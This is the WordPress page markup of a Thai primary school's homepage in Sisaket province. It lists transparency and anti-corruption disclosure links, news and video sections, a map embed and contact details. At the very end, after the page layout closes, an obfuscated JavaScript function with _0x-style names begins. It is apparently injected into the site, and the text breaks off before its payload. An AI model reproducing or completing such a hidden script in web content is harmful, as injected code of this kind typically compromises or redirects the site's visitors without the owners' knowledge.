{\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const 